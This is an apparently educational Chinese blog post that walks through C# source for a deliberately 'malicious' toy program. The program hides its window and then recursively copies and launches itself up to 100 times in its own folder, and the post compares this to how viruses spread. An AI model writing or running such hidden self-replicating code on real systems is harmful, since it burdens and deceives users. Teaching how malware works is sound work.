最近朋友的電腦中了病毒,讓我跑了三次,費了九牛二虎之力,幾種殺毒軟件還是沒有能把病毒全清除掉,最後沒有辦法,只能把資料復制出來,把硬盤重新分區了再裝系統,裝上了可以免費使用的AntiVir,於是乎世界終於清靜。
不僅因為Windows系統的脆弱,而且因為病毒無休止的自我復制和滿硬盤的藏匿,使得我們脆弱的神經不堪重負,面對千瘡百孔,有著莫名其妙而又千奇百怪的名字文件夾和文件的系統,相信大多數人都會選擇重裝系統。病毒和流氓軟件總是讓人氣憤!那麼,計算機程序怎麼實現自我復制呢?其實這非常的簡單。下面我將用C#簡單的實現一個能夠自我復制的小小的惡意程序。
程序要實現下面幾個功能。
第一,運行時不出現運行界面,當然,在任務管理器裡,還是可以看到進程的,道行再深的病毒也不可能無跡可尋。
第二,程序在運行目錄下自我復制n份。
第三,采用遞歸復制的方法,即第一個程序生成第二個程序,第二個程序生成第三個程序,以此類推。
源代碼很簡單,下面來分析一下:
35 // 不在任務欄顯示
36 this.ShowInTaskbar = false;
37 // 窗體透明
38 this.Opacity = 0;
System.Windows.Forms.Form類封裝了一般的Windows窗口程序大部分特性,極大的簡化窗口界面的設計過程,上面這兩個屬性用於隱藏我們的程序的運行狀態,第一個ShowInTaskbar屬性,設置為否時,程序就不會在狀態欄上面顯示。第二個Opacity屬性,表示窗口的不透明度,取值在0到100之間。0%的不透明度也就是100%透明了。這樣,在程序運行時,你就看不見窗體了。
44 // 默認復制次數
45 const int TOTAL = 100;
46 int _count = TOTAL;
47 // 正在運行的程序路徑和文件名
48 string _file = Application.ExecutablePath;
49 // 正在運行的程序路徑
50 string _path = Application.StartupPath;
51 // 正在運行的程序文件名
52 string _name = _file.Replace(string.Format("{0}\\", _path), string.Empty).ToLower();
53 try
54 {
55 _count = int.Parse(_name.Replace(".exe", string.Empty));
56 _count--;
57 }
58 catch
59 {
60 }
61 finally
62 {
63 }
64 // 目標文件
65 string _target = string.Format("{0}\\{1}.exe", _path, _count.ToString("000"));
Application類提供了獲取程序運行絕對路徑並包括文件名的屬性和程序運行絕對路徑的文件名屬性,竟然不直接提供一個文件名的屬性,好奇怪。正規的截取文件名的方法應該根據"\"來判斷,這裡采用了替換的方法,大家可以思考一下如果用SubString怎麼實現。55和56行,如果文件名不是數字,那麼從100.exe開始生成,如果你執行了10000.exe的文件,那麼狠糟糕,你可能需要注銷一下當前用戶來終止程序運行,當然,讓它運行也不會有多大影響。最後,65行,我們把目標鎖定在程序的當前目錄下。病毒和流氓軟件就沒有那麼客氣了,經常它可能會選擇磁盤根目錄、C:\Winodws、C:\Windows\System32或者其他重要的系統目錄中。而且病毒采用了隨機的命名方式或者是模仿系統文件名稱的固定命名方式,以達到隱藏自身和迷惑用戶的目的。
67 if ((File.Exists(_file)) && (_count > 0))
68 {
69 // 復制
70 FileStream _fileStream = File.Open(_file, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
71 byte[] _buffer = new byte[_fileStream.Length];
72 _fileStream.Read(_buffer, 0, _buffer.Length);
73 _fileStream.Close();
74 // 如果目標已存在,刪除
75 if (File.Exists(_target))
76 {
77 File.Delete(_target);
78 }
79 // 粘貼
80 FileStream _writer = File.Open(_target, FileMode.OpenOrCreate, FileAccess.ReadWrite, FileShare.None);
81 _writer.Write(_buffer, 0, _buffer.Length);
82 _writer.Close();
83 // 運行剛復制完成的程序
84 System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo(_target));
85 }
86 Application.Exit();
最後,我們來完成第三個目標,自我復制並且運行復制好的新程序。前面我們得到了_file程序運行絕對路徑並包括文件名,這樣,我們就可以打開並讀取它了。File是文件操作的靜態方法,它只負責打開,關閉,創建和刪除文件,對文件的讀寫,就要由FileStream來操作了。這裡只是整個復制文件,非常的簡單。病毒的特性是可以附加到別的程序或文件上,整個過程就比較復雜了。首先,需要非常了解可執行文件的結構,把原來的可執行文件分解,並且把自身也進行分解,然後重新組合成一個新的可執行文件,但是執行的次序已經改變了,程序開始會先跳轉到病毒代碼,保證病毒能夠被執行後,再跳轉回正常的程序代碼,以使病毒能夠得以在隱藏的狀態下執行。84行調用了新復制完成的程序。以使得新復制的程序能夠自動運行,並且進行下一次的復制。同樣的道理,現在非常多的軟件都提供了自動更新的功能,它的原理基本也是這樣,下載升級包,主程序調用升級程序,如果有必要,主程序會先退出,升級程序完成對主程序或者其他文件的復制更新,然後再重新調用主程序。由此可見,計算機的功能是沒有好壞之分的。病毒能夠運用的原理,普通程序當然也能夠利用。水能載舟亦能覆舟就是這個道理。非常希望您為我提供批評和建議,您可以給我的郵箱[email protected]發送郵件。